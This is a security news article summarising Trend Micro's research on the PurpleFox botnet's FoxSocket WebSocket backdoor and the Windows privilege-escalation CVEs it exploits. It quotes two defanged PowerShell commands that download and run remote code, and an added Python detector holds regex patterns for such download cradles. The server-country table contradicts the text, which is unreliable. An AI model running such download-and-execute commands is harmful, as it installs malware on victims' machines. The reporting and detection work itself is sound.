According to researchers, the new variant uses WebSockets to implement more secure bidirectional C2 communication, and its operators have incorporated new exploits and payloads. Trend Micro researchers have described the PurpleFox botnet's latest evolution, uncovering a new .NET backdoor, known as FoxSocket, that is closely linked to the PurpleFox operation.

The payload analyzed by Trend Micro is a long script that comprises three privilege escalation components. These target Windows 7 to Windows 10 systems, but only 64-bit builds.

The flaws exploited by the latest PurpleFox variant are the following:

  • Windows 7/Windows Server 2008 – CVE-2020-1054, CVE-2019-0808 
  • Windows 8/Windows Server 2012 – CVE-2019-1458 
  • Windows 10/Windows Server 2019 – CVE-2021-1732

In the early iterations, the configuration parameters for deploying this backdoor contained only a small number of subdomains for contacting the C&C servers, compared with the latest one, which is consistent with the creation date of the malicious domain advb9fyxlf2v[.]com.


“After selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded exploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the Tater module to launch the MSI command,” reads the analysis published by Trend Micro. “The goal is to install the MSI package as an admin without any user interaction.”

The list of WebSocket commands observed by Trend Micro is extensive, and although there are some discrepancies between variants, the table below summarizes them.

Overview of WebSocket commands
PowerShell commands being executed:

  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘hxxp[[:]]//[[:]]17881/57BC9B7E.Png’);MsiMake hxxp[[:]]//[[:]]17881/0CFA042F.Png”
  • “cmd.exe” /c powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http[:]//[:]13405/57BC9B7E.Png’);MsiMake http[:]//[:]13405/0CFA042F.Png”

These commands download a malicious payload from the specified URLs, which are hosted on multiple compromised servers. These servers are part of the PurpleFox botnet, with most of these located in China:

  Country        Server count
  United States  26
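The two command lines above are the classic PowerShell download-and-execute cradle (`-nop -exec bypass`, `IEX`, `New-Object Net.WebClient`, `.DownloadString`) followed by the report's `MsiMake` token. The script below is an added detection example, not code from Trend Micro or from this article: it scans process-creation command lines for those indicators, labels each line, and pulls out the URLs so they can be blocked or hunted for. The sample records and the `PLACEHOLDER-HOST` names are constructed (the article only shows host-elided, defanged URLs), and `refang` turns defanged indicators such as the reported domain back into a usable form.

```python
"""Flag PowerShell download-cradle command lines like those in the PurpleFox
report. Added example, not Trend Micro's or the article's code. The sample
records and the PLACEHOLDER-HOST names are constructed."""
import re

# Constructed process-creation records. The article shows only host-elided,
# defanged URLs, so the hosts below are placeholders.
SAMPLE_COMMAND_LINES = [
    '"cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient)'
    ".DownloadString('http://PLACEHOLDER-HOST:17881/57BC9B7E.Png');"
    'MsiMake http://PLACEHOLDER-HOST:17881/0CFA042F.Png"',
    'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"',
    'powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
    'powershell -NonInteractive -ExecutionPolicy Bypass -Command '
    '"Invoke-Expression (New-Object System.Net.WebClient)'
    ".DownloadString('http://PLACEHOLDER-HOST/stage.txt')\"",
]

# Each indicator is one feature of the cradle seen in the report. Short and long
# forms of the switches are covered (-nop / -NoProfile, -exec / -ExecutionPolicy).
INDICATORS = {
    "no_profile": re.compile(r"(?<![\w-])-no?p(rofile)?\b", re.I),
    "exec_bypass": re.compile(r"-e(p|xec(utionpolicy)?)?\s+bypass", re.I),
    "iex": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "webclient": re.compile(r"new-object\s+(system\.)?net\.webclient", re.I),
    "downloadstring": re.compile(r"\.downloadstring\s*\(", re.I),
    "msimake": re.compile(r"\bmsimake\b", re.I),   # token from the report
}

URL_RE = re.compile(r"https?://[^\s'\");]+")


def refang(ioc):
    """Turn a defanged indicator (hxxp, [:], [.]) back into its real form."""
    return (ioc.replace("hxxp", "http").replace("[[:]]", ":")
               .replace("[:]", ":").replace("[.]", "."))


def extract_urls(cmdline):
    """Return every http(s) URL embedded in a command line, in order."""
    return URL_RE.findall(cmdline)


def classify(cmdline):
    """Match the cradle indicators and return a verdict with the evidence.

    download_cradle: in-memory execution of downloaded content (IEX + DownloadString)
    suspicious:      two or more cradle features without the execute step
    benign:          at most one feature (e.g. a plain -NoProfile invocation)
    """
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if "iex" in hits and "downloadstring" in hits:
        verdict = "download_cradle"
    elif len(hits) >= 2:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits, "urls": extract_urls(cmdline)}


def scan(cmdlines):
    """Classify a batch of command lines; returns one result dict per line."""
    return [dict(cmdline=c, **classify(c)) for c in cmdlines]


if __name__ == "__main__":
    for r in scan(SAMPLE_COMMAND_LINES):
        print(f"{r['verdict']:16} {','.join(r['indicators']) or '-':60} {r['urls']}")
    print(refang("advb9fyxlf2v[.]com"))
```

Feeding real process-creation telemetry (Sysmon event 1 or Windows 4688 command lines) into `scan` gives a first-pass triage; the `download_cradle` verdict is the one worth alerting on, while `suspicious` lines are candidates for review rather than automatic blocks.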

The fetched payload is a long script consisting of three components:

  1. Tater (Hot Potato – privilege escalation)
  2. PowerSploit
  3. Embedded exploit bundle binary (privilege escalation)

Finally, the researchers concluded that PurpleFox's rootkit tools allow it to carry out its goals more stealthily: they enable PurpleFox to remain on impacted systems and deliver more payloads to them. We're still keeping an eye on these new variants and their payloads. The new .NET WebSocket backdoor (dubbed FoxSocket and detected as Backdoor.MSIL.PURPLEFOX.AA) is being intensively monitored in order to learn more about this threat actor's aims and goals.

Indicators of compromise:
